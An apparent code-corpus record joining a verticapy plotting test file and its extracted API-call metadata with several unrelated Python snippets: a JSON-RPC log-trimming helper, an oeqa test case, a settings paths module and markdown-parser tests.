# testing vDataFrame[].pie - donut
result = titanic_vd["sex"].pie(method="sum", of="survived", pie_type="donut")
assert result.get_default_bbox_extra_artists()[6].get_text() == "female"
assert int(
result.get_default_bbox_extra_artists()[7].get_text()
) == pytest.approx(302)
plt.close()
# testing vDataFrame[].pie - rose
result = titanic_vd["sex"].pie(method="sum", of="survived", pie_type="rose")
assert len(result.get_default_bbox_extra_artists()) == 8
plt.close()
def test_vDF_pivot_table(self, titanic_vd):
result = titanic_vd.pivot_table(
columns=["age", "pclass"], method="avg", of="survived"
)
assert result[1][0] == pytest.approx(0.75)
assert result[1][1] == pytest.approx(1.0)
assert result[1][2] == pytest.approx(0.782608695652174)
assert result[2][0] == pytest.approx(1.0)
assert result[2][1] == pytest.approx(0.875)
assert result[2][2] == pytest.approx(0.375)
assert len(result[1]) == 12
plt.close()
def test_vDF_outliers_plot(self, titanic_vd):
assert (
len(titanic_vd.outliers_plot(["fare"]).get_default_bbox_extra_artists())
== 24
)
plt.close()
assert (
len(
titanic_vd.outliers_plot(
["fare", "age"]
).get_default_bbox_extra_artists()
)
== 25
)
plt.close()
def test_vDF_plot(self, amazon_vd):
# testing vDataFrame[].plot
result = amazon_vd["number"].plot(ts="date", by="state")
result = result.get_default_bbox_extra_artists()[0].get_data()
assert len(result[0]) == len(result[1]) == pytest.approx(239, 1e-2)
plt.close()
# testing vDataFrame.plot
result = amazon_vd.groupby(["date"], ["AVG(number) AS number"])
result = result.plot(ts="date", columns=["number"])
result = result.get_default_bbox_extra_artists()[0].get_data()
assert result[0][0] == datetime.date(1998, 1, 1)
assert result[0][-1] == datetime.date(2017, 11, 1)
assert result[1][0] == pytest.approx(0.0)
assert result[1][-1] == pytest.approx(651.2962963)
plt.close()
def test_vDF_range_plot(self, amazon_vd):
assert (
len(
amazon_vd["number"]
.range_plot(ts="date")
.get_default_bbox_extra_artists()
)
== 10
)
plt.close()
assert (
len(
amazon_vd["number"]
.range_plot(ts="date")
.get_default_bbox_extra_artists()
)
== 10
)
plt.close()
def test_vDF_scatter(self, iris_vd):
# testing vDataFrame.scatter
result = iris_vd.scatter(columns=["PetalLengthCm", "SepalLengthCm"])
result = result.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result.get_offsets().data]) == 6.9
assert max([elem[1] for elem in result.get_offsets().data]) == 7.9
plt.close()
result2 = iris_vd.scatter(
columns=["PetalLengthCm", "SepalLengthCm", "SepalWidthCm"]
)
result2 = result2.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result2.get_offsets().data]) == 6.9
assert max([elem[1] for elem in result2.get_offsets().data]) == 7.9
plt.close()
# testing vDataFrame.scatter using parameter catcol
result3 = iris_vd.scatter(
columns=["PetalLengthCm", "SepalLengthCm"], catcol="Species"
)
result3 = result3.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result3.get_offsets().data]) <= 6.9
assert max([elem[1] for elem in result3.get_offsets().data]) <= 7.9
plt.close()
result4 = iris_vd.scatter(
columns=["PetalLengthCm", "SepalLengthCm", "SepalWidthCm"], catcol="Species"
)
result4 = result4.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result3.get_offsets().data]) <= 6.9
assert max([elem[1] for elem in result3.get_offsets().data]) <= 7.9
plt.close()
def test_vDF_scatter_matrix(self, iris_vd):
result = iris_vd.scatter_matrix()
assert len(result) == 4
plt.close()
def test_vDF_spider(self, titanic_vd):
result = titanic_vd["pclass"].spider("survived")
assert len(result.get_default_bbox_extra_artists()) == 9
|
[
"matplotlib.pyplot.close",
"verticapy.drop_table",
"pytest.fixture",
"verticapy.learn.datasets.load_iris",
"verticapy.learn.datasets.load_world",
"pytest.approx",
"datetime.date",
"warnings.catch_warnings",
"verticapy.learn.datasets.load_amazon",
"verticapy.learn.datasets.load_titanic",
"verticapy.set_option",
"pytest.mark.skip",
"verticapy.create_verticapy_schema"
] |
[((778, 809), 'verticapy.set_option', 'set_option', (['"""print_info"""', '(False)'], {}), "('print_info', False)\n", (788, 809), False, 'from verticapy import set_option\n'), ((813, 843), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (827, 843), False, 'import pytest, datetime, warnings\n'), ((1126, 1156), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (1140, 1156), False, 'import pytest, datetime, warnings\n'), ((1369, 1399), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (1383, 1399), False, 'import pytest, datetime, warnings\n'), ((1600, 1630), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (1614, 1630), False, 'import pytest, datetime, warnings\n'), ((935, 967), 'verticapy.learn.datasets.load_titanic', 'load_titanic', ([], {'cursor': 'base.cursor'}), '(cursor=base.cursor)\n', (947, 967), False, 'from verticapy.learn.datasets import load_titanic\n'), ((1245, 1276), 'verticapy.learn.datasets.load_amazon', 'load_amazon', ([], {'cursor': 'base.cursor'}), '(cursor=base.cursor)\n', (1256, 1276), False, 'from verticapy.learn.datasets import load_amazon\n'), ((1298, 1350), 'verticapy.drop_table', 'drop_table', ([], {'name': '"""public.amazon"""', 'cursor': 'base.cursor'}), "(name='public.amazon', cursor=base.cursor)\n", (1308, 1350), False, 'from verticapy import vDataFrame, drop_table, create_verticapy_schema\n'), ((1482, 1511), 'verticapy.learn.datasets.load_iris', 'load_iris', ([], {'cursor': 'base.cursor'}), '(cursor=base.cursor)\n', (1491, 1511), False, 'from verticapy.learn.datasets import load_iris\n'), ((1531, 1581), 'verticapy.drop_table', 'drop_table', ([], {'name': '"""public.iris"""', 'cursor': 'base.cursor'}), "(name='public.iris', cursor=base.cursor)\n", (1541, 1581), False, 'from verticapy import vDataFrame, drop_table, create_verticapy_schema\n'), ((1717, 1747), 'verticapy.learn.datasets.load_world', 'load_world', ([], {'cursor': 'base.cursor'}), '(cursor=base.cursor)\n', (1727, 1747), False, 'from verticapy.learn.datasets import load_world\n'), ((7514, 7561), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test not implemented"""'}), "(reason='test not implemented')\n", (7530, 7561), False, 'import pytest, datetime, warnings\n'), ((995, 1031), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {'record': '(True)'}), '(record=True)\n', (1018, 1031), False, 'import pytest, datetime, warnings\n'), ((1046, 1099), 'verticapy.drop_table', 'drop_table', ([], {'name': '"""public.titanic"""', 'cursor': 'base.cursor'}), "(name='public.titanic', cursor=base.cursor)\n", (1056, 1099), False, 'from verticapy import vDataFrame, drop_table, create_verticapy_schema\n'), ((1774, 1810), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {'record': '(True)'}), '(record=True)\n', (1797, 1810), False, 'import pytest, datetime, warnings\n'), ((1825, 1876), 'verticapy.drop_table', 'drop_table', ([], {'name': '"""public.world"""', 'cursor': 'base.cursor'}), "(name='public.world', cursor=base.cursor)\n", (1835, 1876), False, 'from verticapy import vDataFrame, drop_table, create_verticapy_schema\n'), ((2219, 2230), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2228, 2230), True, 'import matplotlib.pyplot as plt\n'), ((2493, 2504), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2502, 2504), True, 'import matplotlib.pyplot as plt\n'), ((2980, 2991), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2989, 2991), True, 'import matplotlib.pyplot as plt\n'), ((3428, 3439), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3437, 3439), True, 'import matplotlib.pyplot as plt\n'), ((4429, 4440), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (4438, 4440), True, 'import matplotlib.pyplot as plt\n'), ((5192, 5203), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (5201, 5203), True, 'import matplotlib.pyplot as plt\n'), ((5558, 5569), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (5567, 5569), True, 'import matplotlib.pyplot as plt\n'), ((5995, 6006), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6004, 6006), True, 'import matplotlib.pyplot as plt\n'), ((6463, 6474), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6472, 6474), True, 'import matplotlib.pyplot as plt\n'), ((7496, 7507), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (7505, 7507), True, 'import matplotlib.pyplot as plt\n'), ((7907, 7918), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (7916, 7918), True, 'import matplotlib.pyplot as plt\n'), ((8362, 8373), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (8371, 8373), True, 'import matplotlib.pyplot as plt\n'), ((8848, 8859), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (8857, 8859), True, 'import matplotlib.pyplot as plt\n'), ((9307, 9318), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (9316, 9318), True, 'import matplotlib.pyplot as plt\n'), ((10292, 10303), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (10301, 10303), True, 'import matplotlib.pyplot as plt\n'), ((10663, 10674), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (10672, 10674), True, 'import matplotlib.pyplot as plt\n'), ((10847, 10858), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (10856, 10858), True, 'import matplotlib.pyplot as plt\n'), ((11195, 11206), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11204, 11206), True, 'import matplotlib.pyplot as plt\n'), ((11407, 11418), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11416, 11418), True, 'import matplotlib.pyplot as plt\n'), ((11949, 11960), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11958, 11960), True, 'import matplotlib.pyplot as plt\n'), ((12150, 12161), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (12159, 12161), True, 'import matplotlib.pyplot as plt\n'), ((12375, 12386), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (12384, 12386), True, 'import matplotlib.pyplot as plt\n'), ((12684, 12695), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (12693, 12695), True, 'import matplotlib.pyplot as plt\n'), ((13167, 13178), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (13176, 13178), True, 'import matplotlib.pyplot as plt\n'), ((13435, 13446), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (13444, 13446), True, 'import matplotlib.pyplot as plt\n'), ((13656, 13667), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (13665, 13667), True, 'import matplotlib.pyplot as plt\n'), ((14042, 14053), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (14051, 14053), True, 'import matplotlib.pyplot as plt\n'), ((14392, 14403), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (14401, 14403), True, 'import matplotlib.pyplot as plt\n'), ((14805, 14816), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (14814, 14816), True, 'import matplotlib.pyplot as plt\n'), ((15173, 15184), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (15182, 15184), True, 'import matplotlib.pyplot as plt\n'), ((15316, 15327), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (15325, 15327), True, 'import matplotlib.pyplot as plt\n'), ((2711, 2744), 'pytest.approx', 'pytest.approx', (['(0.7965964343598055)'], {}), '(0.7965964343598055)\n', (2724, 2744), False, 'import pytest, datetime, warnings\n'), ((2840, 2874), 'pytest.approx', 'pytest.approx', (['(0.12236628849270664)'], {}), '(0.12236628849270664)\n', (2853, 2874), False, 'import pytest, datetime, warnings\n'), ((2938, 2971), 'pytest.approx', 'pytest.approx', (['(42.694100000000006)'], {}), '(42.694100000000006)\n', (2951, 2971), False, 'import pytest, datetime, warnings\n'), ((3189, 3207), 'pytest.approx', 'pytest.approx', (['(391)'], {}), '(391)\n', (3202, 3207), False, 'import pytest, datetime, warnings\n'), ((3304, 3321), 'pytest.approx', 'pytest.approx', (['(34)'], {}), '(34)\n', (3317, 3321), False, 'import pytest, datetime, warnings\n'), ((3386, 3419), 'pytest.approx', 'pytest.approx', (['(102.46583999999999)'], {}), '(102.46583999999999)\n', (3399, 3419), False, 'import pytest, datetime, warnings\n'), ((4010, 4021), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (4019, 4021), True, 'import matplotlib.pyplot as plt\n'), ((4234, 4268), 'pytest.approx', 'pytest.approx', (['(0.38782051282051283)'], {}), '(0.38782051282051283)\n', (4247, 4268), False, 'import pytest, datetime, warnings\n'), ((4365, 4398), 'pytest.approx', 'pytest.approx', (['(0.6121794871794872)'], {}), '(0.6121794871794872)\n', (4378, 4398), False, 'import pytest, datetime, warnings\n'), ((4619, 4653), 'pytest.approx', 'pytest.approx', (['(0.09805510534846029)'], {}), '(0.09805510534846029)\n', (4632, 4653), False, 'import pytest, datetime, warnings\n'), ((4750, 4784), 'pytest.approx', 'pytest.approx', (['(-0.1547811993517018)'], {}), '(-0.1547811993517018)\n', (4763, 4784), False, 'import pytest, datetime, warnings\n'), ((5036, 5062), 'pytest.approx', 'pytest.approx', (['(16.07647847)'], {}), '(16.07647847)\n', (5049, 5062), False, 'import pytest, datetime, warnings\n'), ((5163, 5183), 'pytest.approx', 'pytest.approx', (['(36.25)'], {}), '(36.25)\n', (5176, 5183), False, 'import pytest, datetime, warnings\n'), ((5403, 5425), 'pytest.approx', 'pytest.approx', (['(31.3875)'], {}), '(31.3875)\n', (5416, 5425), False, 'import pytest, datetime, warnings\n'), ((5526, 5549), 'pytest.approx', 'pytest.approx', (['(512.3292)'], {}), '(512.3292)\n', (5539, 5549), False, 'import pytest, datetime, warnings\n'), ((6581, 6645), 'verticapy.create_verticapy_schema', 'create_verticapy_schema', (["iris_vd._VERTICAPY_VARIABLES_['cursor']"], {}), "(iris_vd._VERTICAPY_VARIABLES_['cursor'])\n", (6604, 6645), False, 'from verticapy import vDataFrame, drop_table, create_verticapy_schema\n'), ((6930, 6941), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6939, 6941), True, 'import matplotlib.pyplot as plt\n'), ((7213, 7224), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (7222, 7224), True, 'import matplotlib.pyplot as plt\n'), ((8178, 8213), 'pytest.approx', 'pytest.approx', (['(80.00000007967)', '(0.01)'], {}), '(80.00000007967, 0.01)\n', (8191, 8213), False, 'import pytest, datetime, warnings\n'), ((8302, 8331), 'pytest.approx', 'pytest.approx', (['(512.3292)', '(0.01)'], {}), '(512.3292, 0.01)\n', (8315, 8331), False, 'import pytest, datetime, warnings\n'), ((8583, 8618), 'pytest.approx', 'pytest.approx', (['(0.050243111831442464)'], {}), '(0.050243111831442464)\n', (8596, 8618), False, 'import pytest, datetime, warnings\n'), ((8715, 8750), 'pytest.approx', 'pytest.approx', (['(0.029983792544570502)'], {}), '(0.029983792544570502)\n', (8728, 8750), False, 'import pytest, datetime, warnings\n'), ((8814, 8839), 'pytest.approx', 'pytest.approx', (['(7.24272727)'], {}), '(7.24272727)\n', (8827, 8839), False, 'import pytest, datetime, warnings\n'), ((9076, 9108), 'pytest.approx', 'pytest.approx', (['(0.534653465346535)'], {}), '(0.534653465346535)\n', (9089, 9108), False, 'import pytest, datetime, warnings\n'), ((9206, 9238), 'pytest.approx', 'pytest.approx', (['(0.354838709677419)'], {}), '(0.354838709677419)\n', (9219, 9238), False, 'import pytest, datetime, warnings\n'), ((9281, 9298), 'pytest.approx', 'pytest.approx', (['(15)'], {}), '(15)\n', (9294, 9298), False, 'import pytest, datetime, warnings\n'), ((9915, 9926), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (9924, 9926), True, 'import matplotlib.pyplot as plt\n'), ((10118, 10152), 'pytest.approx', 'pytest.approx', (['(0.07374392220421394)'], {}), '(0.07374392220421394)\n', (10131, 10152), False, 'import pytest, datetime, warnings\n'), ((10250, 10283), 'pytest.approx', 'pytest.approx', (['(0.4327390599675851)'], {}), '(0.4327390599675851)\n', (10263, 10283), False, 'import pytest, datetime, warnings\n'), ((10631, 10654), 'pytest.approx', 'pytest.approx', (['(0.227753)'], {}), '(0.227753)\n', (10644, 10654), False, 'import pytest, datetime, warnings\n'), ((11168, 11186), 'pytest.approx', 'pytest.approx', (['(302)'], {}), '(302)\n', (11181, 11186), False, 'import pytest, datetime, warnings\n'), ((11617, 11636), 'pytest.approx', 'pytest.approx', (['(0.75)'], {}), '(0.75)\n', (11630, 11636), False, 'import pytest, datetime, warnings\n'), ((11668, 11686), 'pytest.approx', 'pytest.approx', (['(1.0)'], {}), '(1.0)\n', (11681, 11686), False, 'import pytest, datetime, warnings\n'), ((11718, 11750), 'pytest.approx', 'pytest.approx', (['(0.782608695652174)'], {}), '(0.782608695652174)\n', (11731, 11750), False, 'import pytest, datetime, warnings\n'), ((11782, 11800), 'pytest.approx', 'pytest.approx', (['(1.0)'], {}), '(1.0)\n', (11795, 11800), False, 'import pytest, datetime, warnings\n'), ((11832, 11852), 'pytest.approx', 'pytest.approx', (['(0.875)'], {}), '(0.875)\n', (11845, 11852), False, 'import pytest, datetime, warnings\n'), ((11884, 11904), 'pytest.approx', 'pytest.approx', (['(0.375)'], {}), '(0.375)\n', (11897, 11904), False, 'import pytest, datetime, warnings\n'), ((12651, 12675), 'pytest.approx', 'pytest.approx', (['(239)', '(0.01)'], {}), '(239, 0.01)\n', (12664, 12675), False, 'import pytest, datetime, warnings\n'), ((12965, 12990), 'datetime.date', 'datetime.date', (['(1998)', '(1)', '(1)'], {}), '(1998, 1, 1)\n', (12978, 12990), False, 'import pytest, datetime, warnings\n'), ((13023, 13049), 'datetime.date', 'datetime.date', (['(2017)', '(11)', '(1)'], {}), '(2017, 11, 1)\n', (13036, 13049), False, 'import pytest, datetime, warnings\n'), ((13081, 13099), 'pytest.approx', 'pytest.approx', (['(0.0)'], {}), '(0.0)\n', (13094, 13099), False, 'import pytest, datetime, warnings\n'), ((13132, 13158), 'pytest.approx', 'pytest.approx', (['(651.2962963)'], {}), '(651.2962963)\n', (13145, 13158), False, 'import pytest, datetime, warnings\n'), ((3847, 3866), 'pytest.approx', 'pytest.approx', (['(50.0)'], {}), '(50.0)\n', (3860, 3866), False, 'import pytest, datetime, warnings\n'), ((3975, 3997), 'pytest.approx', 'pytest.approx', (['(77.9583)'], {}), '(77.9583)\n', (3988, 3997), False, 'import pytest, datetime, warnings\n'), ((9728, 9760), 'pytest.approx', 'pytest.approx', (['(0.964285714285714)'], {}), '(0.964285714285714)\n', (9741, 9760), False, 'import pytest, datetime, warnings\n'), ((9870, 9902), 'pytest.approx', 'pytest.approx', (['(0.325581395348837)'], {}), '(0.325581395348837)\n', (9883, 9902), False, 'import pytest, datetime, warnings\n')]
|
"""Logging"""
import json
import logging
from typing import Any, Dict, List, Optional, Union, cast
def _trim_string(message: str) -> str:
longest_string = 30
if len(message) > longest_string:
prefix_len = int(longest_string / 3)
suffix_len = prefix_len
return message[:prefix_len] + "..." + message[-suffix_len:]
return message
def _trim_dict(message_obj: Dict[str, Any]) -> Dict[str, Any]:
result = {}
longest_list = 30
for k, val in message_obj.items():
if isinstance(val, str):
result[k] = _trim_string(val)
elif isinstance(val, list) and len(val) > longest_list:
prefix_len = int(longest_list / 3)
suffix_len = prefix_len
result[k] = cast(str, val[:prefix_len] + ["..."] + val[-suffix_len:])
elif isinstance(val, dict):
result[k] = cast(str, _trim_values(val))
else:
result[k] = val
return result
def _trim_values(message_obj: Union[Dict, List]) -> Union[Dict, List]:
# Batch?
if isinstance(message_obj, list):
return [_trim_dict(i) for i in message_obj]
else:
return _trim_dict(message_obj)
def _trim_message(message: str) -> str:
# Attempt to deserialize
try:
message_obj = json.loads(message)
except ValueError:
# Could not be deserialized, trim the string anyway.
return _trim_string(str(message))
else:
return json.dumps(_trim_values(message_obj))
def log_(
message: str,
logger: logging.Logger,
level: str = "info",
extra: Optional[Dict] = None,
trim: bool = False,
) -> None:
"""
Log a request or response
:param message: JSON-RPC request or response string.
:param logger: logging.Logger
:param level: Log level.
:param extra: More details to include in the log entry.
:param trim: Abbreviate log messages.
:return:
"""
if extra is None:
extra = {}
# Clean up the message for logging
if message:
message = message.replace("\n", "").replace(" ", " ").replace("{ ", "{")
if trim:
message = _trim_message(message)
# Log.
getattr(logger, level)(message, extra=extra)
|
[
"typing.cast",
"json.loads"
] |
[((1290, 1309), 'json.loads', 'json.loads', (['message'], {}), '(message)\n', (1300, 1309), False, 'import json\n'), ((756, 813), 'typing.cast', 'cast', (['str', "(val[:prefix_len] + ['...'] + val[-suffix_len:])"], {}), "(str, val[:prefix_len] + ['...'] + val[-suffix_len:])\n", (760, 813), False, 'from typing import Any, Dict, List, Optional, Union, cast\n')]
|
# Copyright (C) 2016 Intel Corporation
# Released under the MIT license (see COPYING.MIT)
from oeqa.core.case import OETestCase
from oeqa.core.decorator.oetag import OETestTag
from oeqa.core.decorator.data import OETestDataDepends
class DataTest(OETestCase):
data_vars = ['IMAGE', 'ARCH']
@OETestDataDepends(['MACHINE',])
@OETestTag('dataTestOk')
def testDataOk(self):
self.assertEqual(self.td.get('IMAGE'), 'core-image-minimal')
self.assertEqual(self.td.get('ARCH'), 'x86')
self.assertEqual(self.td.get('MACHINE'), 'qemuarm')
@OETestTag('dataTestFail')
def testDataFail(self):
pass
|
[
"oeqa.core.decorator.data.OETestDataDepends",
"oeqa.core.decorator.oetag.OETestTag"
] |
[((301, 331), 'oeqa.core.decorator.data.OETestDataDepends', 'OETestDataDepends', (["['MACHINE']"], {}), "(['MACHINE'])\n", (318, 331), False, 'from oeqa.core.decorator.data import OETestDataDepends\n'), ((338, 361), 'oeqa.core.decorator.oetag.OETestTag', 'OETestTag', (['"""dataTestOk"""'], {}), "('dataTestOk')\n", (347, 361), False, 'from oeqa.core.decorator.oetag import OETestTag\n'), ((576, 601), 'oeqa.core.decorator.oetag.OETestTag', 'OETestTag', (['"""dataTestFail"""'], {}), "('dataTestFail')\n", (585, 601), False, 'from oeqa.core.decorator.oetag import OETestTag\n')]
|
# coding: utf-8
"""
This module contains all the paths for alls this project's directories,
that we created dynamically.
All paths are absolute, without symlink and in unicode.
We also add the 'apps' and 'libs' directories to the PYTHON PATH, which
will make the imports much easier.
"""
import sys
import os
import tempfile
from pathlib import Path
# This part is a bit complicated and is not mandatory for your project, but
# it renders it completely portable since all directory paths are dynamically
# generated instead of being hard coded.
# We get the 'settings.py' file path (the __FILE__ variable contains
# automatically the path of the current file) and we transform this string
# to unicode in case you got non ASCII characters in this name (
# sys.getfilesystemencoding() get us the file system encoding which can be
# different for Windows, Mac or Linux)
THIS_FILE = Path(__file__)
# We dynamically create these settings, giving us the absolute path
# to the project directory, the root directory containing all our work
# and any other directory we might need
PROJECT_DIR = THIS_FILE.absolute().resolve()
BASE_DIR = PROJECT_DIR.parent.parent
APPS_DIR = BASE_DIR / 'apps'
LIBS_DIR = BASE_DIR / 'ignore_this_directory'
TEMP_DIR = Path(tempfile.gettempdir())
# We add the apps and libs directory to the PYTHON PATH, so we can import each
# package without prefixing them with the parent package name. This mimic the
# behavior we would have if they were at the root directory or installed with
# pip.
#
# E.G: we can do from "app1_hello.views import hello" instead of
# "from apps.app1_hello.views import hello" or "import django" instead of
# "from libs import django"
#
# When you have a small project, you can avoid this and put all apps at the root
# dir like in the official Django tutorial, but in a big project with a lots of
# apps, you usually put them all in an "apps" dir like we did, so it's a good
# thing to know.
sys.path.append(str(LIBS_DIR))
sys.path.append(str(APPS_DIR))
|
[
"pathlib.Path",
"tempfile.gettempdir"
] |
[((911, 925), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (915, 925), False, 'from pathlib import Path\n'), ((1279, 1300), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (1298, 1300), False, 'import tempfile\n')]
|
# coding: utf-8
"""
test_shopidown
----------------------------------
Tests for `shopidown` module.
"""
import textwrap
from shopidown.parser import Parser
parser = Parser()
def test_title():
""" Tests that a title parsers to h1 tag """
assert parser.parse("# Title *italic* **bold**") == "<h1>Title <em>italic</em> <strong>bold</strong></h1>"
def test_invalid_em_title():
"""
Tests that a title without two 'em' marks
parsers to h1 tag
"""
assert parser.parse("# Title *italic **bold**") == "<h1>Title *italic <strong>bold</strong></h1>"
def test_invalid_strong_title():
"""
Tests that a title without two 'strong' marks
parsers to h1 tag
"""
assert parser.parse("# Title *italic* **bold") == "<h1>Title <em>italic</em> **bold</h1>"
def test_subtitle():
""" Tests that a subtitle parsers to h2 tags """
assert parser.parse("## Subtitle") == "<h2>Subtitle</h2>"
def test_pseudo_subtitle():
""" Tests that a pseudo subtitle parsers to a paragraph """
assert parser.parse("Subtitle## ") == "<p>Subtitle## </p>"
def test_parse_unordered_list():
""" Tests that we can parse an unordered list """
input_text = textwrap.dedent("""\
- list item 1
- list item 2
""")
output_text = textwrap.dedent("""\
<ul>
<li>list item 1</li>
<li>list item 2</li>
</ul>
""")
assert parser.parse(input_text) == output_text
def test_parse_ordered_list():
""" Tests that we can parse an ordered list """
input_text = textwrap.dedent("""\
1. ordered item 1
2. ordered item 2
""")
output_text = textwrap.dedent("""\
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
</ol>
""")
assert parser.parse(input_text) == output_text
def test_lists():
""" Test that we can parse ul and ol """
input_text = textwrap.dedent("""\
- list item 1
- list item 2
1. ordered item 1
2. ordered item 2
""")
output_text = textwrap.dedent("""\
<ul>
<li>list item 1</li>
<li>list item 2</li>
</ul>
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
</ol>
""")
assert parser.parse(input_text) == output_text
def test_inverted_lists():
""" Test that we can parse ol and ul """
input_text = textwrap.dedent("""\
1. ordered item 1
2. ordered item 2
- list item 1
- list item 2
""")
output_text = textwrap.dedent("""\
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
</ol>
<ul>
<li>list item 1</li>
<li>list item 2</li>
</ul>
""")
assert parser.parse(input_text) == output_text
def test_guilhaume_markdown_text():
""" Test that we can parse the markdown text Guillaume wrote """
input_text = textwrap.dedent("""\
# Title *italic* **bold**
## Subtitle
Paragraph1
Paragraph2
- list item 1
- list item 2
1. ordered item 1
2. ordered item 2
""")
output_text = textwrap.dedent("""\
<h1>Title <em>italic</em> <strong>bold</strong></h1>
<h2>Subtitle</h2>
<p>Paragraph1</p>
<p>Paragraph2</p>
<ul>
<li>list item 1</li>
<li>list item 2</li>
</ul>
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
</ol>
""")
assert parser.parse(input_text) == output_text
def test_improved_guilhaume_markdown_text():
"""
Test that we can parse an improved version of
the markdown text Guillaume wrote
"""
input_text = textwrap.dedent("""\
# Title *italic* **bold**
## Subtitle
Paragraph1
Paragraph2
- list item 1
- list item 2
1. ordered item 1
2. ordered item 2
## Subtitle
Paragraph1
Paragraph2
# Title *italic* **bold**
1. ordered item 1
2. ordered item 2
3. ordered item 3
4. ordered item 4
- list item 1
- list item 2
- list item 3
- list item 4
""")
output_text = textwrap.dedent("""\
<h1>Title <em>italic</em> <strong>bold</strong></h1>
<h2>Subtitle</h2>
<p>Paragraph1</p>
<p>Paragraph2</p>
<ul>
<li>list item 1</li>
<li>list item 2</li>
</ul>
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
</ol>
<h2>Subtitle</h2>
<p>Paragraph1</p>
<p>Paragraph2</p>
<h1>Title <em>italic</em> <strong>bold</strong></h1>
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
<li>ordered item 3</li>
<li>ordered item 4</li>
</ol>
<ul>
<li>list item 1</li>
<li>list item 2</li>
<li>list item 3</li>
<li>list item 4</li>
</ul>
""")
assert parser.parse(input_text) == output_text
|
[
"textwrap.dedent",
"shopidown.parser.Parser"
] |
[((172, 180), 'shopidown.parser.Parser', 'Parser', ([], {}), '()\n', (178, 180), False, 'from shopidown.parser import Parser\n'), ((1197, 1260), 'textwrap.dedent', 'textwrap.dedent', (['""" - list item 1\n - list item 2\n """'], {}), '(""" - list item 1\n - list item 2\n """)\n', (1212, 1260), False, 'import textwrap\n'), ((1282, 1392), 'textwrap.dedent', 'textwrap.dedent', (['""" <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n """'], {}), '(\n """ <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n """\n )\n', (1297, 1392), False, 'import textwrap\n'), ((1539, 1610), 'textwrap.dedent', 'textwrap.dedent', (['""" 1. ordered item 1\n 2. ordered item 2\n """'], {}), '(""" 1. ordered item 1\n 2. ordered item 2\n """)\n', (1554, 1610), False, 'import textwrap\n'), ((1632, 1748), 'textwrap.dedent', 'textwrap.dedent', (['""" <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """'], {}), '(\n """ <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """\n )\n', (1647, 1748), False, 'import textwrap\n'), ((1876, 1994), 'textwrap.dedent', 'textwrap.dedent', (['""" - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n """'], {}), '(\n """ - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n """\n )\n', (1891, 1994), False, 'import textwrap\n'), ((2006, 2196), 'textwrap.dedent', 'textwrap.dedent', (['""" <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """'], {}), '(\n """ <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n 